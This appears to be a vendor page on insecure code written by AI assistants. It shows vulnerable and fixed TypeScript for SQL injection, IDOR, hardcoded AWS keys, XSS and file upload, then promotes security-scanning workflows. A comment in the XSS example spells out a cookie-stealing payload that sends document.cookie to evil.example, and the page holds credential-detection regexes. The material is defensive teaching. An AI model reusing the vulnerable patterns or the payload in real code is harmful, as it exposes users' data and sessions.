Insecure Code
This is the "Trojan Horse" pain point. In its quest to provide a functional answer, the AI will often generate code riddled with classic, well-known security vulnerabilities. It is "security-blind" by default, trained on a massive corpus of public internet code that is itself notoriously insecure. Without explicit, security-focused guardrails, the AI will happily and confidently hand you code that opens a gaping hole in your application and passes a quick review because it "looks like it works."
An AI's primary objective is to generate code that functionally satisfies the prompt, not code that is secure. It lacks the "adversarial mindset" of a security engineer and will naively replicate dangerous patterns it learned from its training data. This includes failing to sanitize user inputs, forgetting to implement authorization checks, or hardcoding sensitive data. These vulnerabilities are invisible to a standard functional review, creating a "stealth" security debt that attackers can easily exploit.
This is a direct and immediate threat to the business. The impact goes far beyond a simple bug; it can lead to catastrophic security breaches, massive data exfiltration (of customer data or IP), and severe compliance violations (e.g., GDPR, HIPAA, PCI). The cost of a breach is enormous, measured not just in emergency remediation costs and regulatory fines, but in the permanent loss of customer trust and brand reputation.
The Classic SQL Injection (SQLi)
A developer prompts, "write a function to get a user from the database by userId." The AI generates a "working" function that directly concatenates the userId variable into the SQL string, creating a textbook SQL injection vulnerability.
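A minimal sketch of the pattern in a Node service, assuming the mysql2 client and a hypothetical users table; the vulnerable version is what the AI typically produces, the fix is a parameterized query:

```typescript
import mysql from "mysql2/promise";

const pool = mysql.createPool({ host: "localhost", database: "app" });

// What the AI often produces: userId is concatenated into the SQL string,
// so an input like "1 OR 1=1" returns every row in the table.
async function getUserVulnerable(userId: string) {
  const [rows] = await pool.query(`SELECT * FROM users WHERE id = ${userId}`);
  return rows;
}

// The fix: a parameterized query. The driver sends the value separately
// from the SQL text, so it can never be interpreted as SQL.
async function getUserSafe(userId: string) {
  const [rows] = await pool.execute("SELECT * FROM users WHERE id = ?", [userId]);
  return rows;
}
```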
The "Forgot to Check" Vulnerability (IDOR)
The AI generates a "get order details" endpoint (/api/orders/:orderId) but forgets to add the authentication or authorization check to verify that the logged-in user actually owns that order. This allows any user to view any other user's order just by guessing the ID.
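A sketch of the same mistake and its fix in Express; requireAuth and findOrderById are hypothetical helpers standing in for your session middleware and database layer:

```typescript
import express, { Request, Response, NextFunction } from "express";

// Hypothetical helpers: requireAuth populates res.locals.user from the
// session, and findOrderById wraps a parameterized database lookup.
declare function requireAuth(req: Request, res: Response, next: NextFunction): void;
declare function findOrderById(id: string): Promise<{ ownerId: string } | null>;

const app = express();

// Vulnerable: authenticates the caller but never checks ownership,
// so any logged-in user can read any order by guessing IDs.
app.get("/api/orders/:orderId", requireAuth, async (req, res) => {
  res.json(await findOrderById(req.params.orderId));
});

// Fixed: verify the record belongs to the caller before returning it.
app.get("/api/v2/orders/:orderId", requireAuth, async (req, res) => {
  const order = await findOrderById(req.params.orderId);
  if (!order || order.ownerId !== res.locals.user.id) {
    return res.status(404).send("Not found"); // 404 avoids confirming the order exists
  }
  res.json(order);
});
```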
The "Hardcoded Secret" Leak
You ask the AI to "write code to connect to the S3 bucket." The AI generates the code and helpfully includes AWS_ACCESS_KEY and AWS_SECRET_KEY values hardcoded directly in the file (placeholders, or worse, real keys if it saw them in context), which are then committed to source control.
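A sketch of both versions using the AWS SDK v3 S3 client; the key strings are illustrative placeholders:

```typescript
import { S3Client } from "@aws-sdk/client-s3";

// What the AI often produces: credentials hardcoded in the file,
// one `git commit` away from being public.
const badClient = new S3Client({
  region: "us-east-1",
  credentials: {
    accessKeyId: "AKIA...",        // never do this
    secretAccessKey: "abc123...",  // never do this
  },
});

// The fix: omit credentials entirely and let the SDK's default provider
// chain resolve them from the environment, an IAM role, or an SSO session.
const client = new S3Client({ region: "us-east-1" });
```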
Cross-Site Scripting (XSS)
The AI generates code to "display a user's comment on the page" but fails to sanitize the comment string before rendering it as HTML, allowing an attacker to inject malicious <script> tags that steal other users' session cookies.
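A minimal sketch of the escaping fix; in a real application, prefer your framework's built-in escaping or a vetted library such as DOMPurify over hand-rolled code:

```typescript
// Vulnerable: interpolating user input into HTML executes anything in it,
// e.g. a comment of "<script>fetch('https://evil.example?c='+document.cookie)</script>".
function renderCommentVulnerable(comment: string): string {
  return `<div class="comment">${comment}</div>`;
}

// Fixed: escape the five HTML metacharacters before rendering.
function escapeHtml(input: string): string {
  return input
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderComment(comment: string): string {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}
```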
The Insecure File Upload
The AI generates a "file upload" endpoint that fails to validate the file type or sanitize the filename, allowing an attacker to upload an executable web shell (.php, .aspx) and take over the server.
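A hardened sketch using Express with the multer upload middleware; the allow-list, size limit, and upload directory are assumptions you would tune for your application:

```typescript
import crypto from "node:crypto";
import path from "node:path";
import express from "express";
import multer from "multer";

const ALLOWED = new Set(["image/png", "image/jpeg"]);

const upload = multer({
  dest: "/var/uploads",                   // outside the web root, never executed
  limits: { fileSize: 5 * 1024 * 1024 }, // cap uploads at 5 MB
  fileFilter: (_req, file, cb) => {
    // Allow-list MIME types; reject everything else (.php, .aspx, ...).
    // Note: mimetype is client-supplied, so production code should also
    // sniff the file's magic bytes and validate the extension.
    cb(null, ALLOWED.has(file.mimetype));
  },
});

const app = express();

app.post("/upload", upload.single("file"), (req, res) => {
  if (!req.file) return res.status(400).send("Unsupported file type");
  // Never trust the client's filename: generate our own.
  const safeName = crypto.randomUUID() + path.extname(req.file.originalname);
  res.json({ stored: safeName });
});
```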
The problem isn't the AI; it's the lack of a human-in-the-loop verification and governance system. These workflows are the perfect antidote.
Security Guardrails
View workflow →
The Pain Point It Solves
This workflow directly attacks the "Trojan Horse" problem by requiring security scans (SAST, secret scanning) before merge and enforcing security-focused code review checklists. Instead of allowing security-blind AI code to pass a quick functional review, this workflow ensures that security vulnerabilities are caught before they enter the codebase.
Why It Works
It enforces security scanning. The workflow requires security scans (SAST, secret scanning) before merge, enforces review checklists that cover the OWASP Top 10, and runs automated security tests, so SQL injection, XSS, hardcoded secrets, and similar vulnerabilities are caught before they can be exploited. The AI can no longer confidently hand you code that opens a gaping hole in your application.
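To make the secret-scanning leg of that gate concrete, here is a minimal, hypothetical pre-merge script that fails the build if changed files match common credential patterns; real teams would use a dedicated scanner (gitleaks, GitHub secret scanning), and origin/main as the base branch is an assumption:

```typescript
import { execSync } from "node:child_process";
import { existsSync, readFileSync } from "node:fs";

// Patterns for a few common credential shapes. Real scanners ship hundreds.
const PATTERNS = [
  /AKIA[0-9A-Z]{16}/,                                       // AWS access key ID
  /(secret|password|api_key)\s*[:=]\s*["'][^"']{8,}["']/i, // generic assignment
];

// Files changed on this branch relative to the base branch.
const changed = execSync("git diff --name-only origin/main...HEAD", {
  encoding: "utf8",
}).split("\n").filter(Boolean);

let leaked = false;
for (const file of changed) {
  if (!existsSync(file)) continue; // file was deleted on this branch
  const text = readFileSync(file, "utf8");
  for (const pattern of PATTERNS) {
    if (pattern.test(text)) {
      console.error(`Possible secret in ${file} (matched ${pattern})`);
      leaked = true;
    }
  }
}

if (leaked) process.exit(1); // non-zero exit blocks the merge in CI
```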
Release Readiness Runbook
View workflow →
The Pain Point It Solves
This workflow addresses the "stealth security debt" problem by running pre-release smoke tests that include security scans. Instead of allowing insecure code to reach production, it ensures that all security guardrails have been cleared before release.
Why It Works
It validates security before release. The workflow runs smoke tests covering code quality, security scans, and schema checks before the release window; captures validator outputs (pass/fail) and stores them with the release notes; and requires security sign-off before deployment. Insecure code therefore cannot reach production even if it passes functional review, heading off catastrophic breaches and data exfiltration.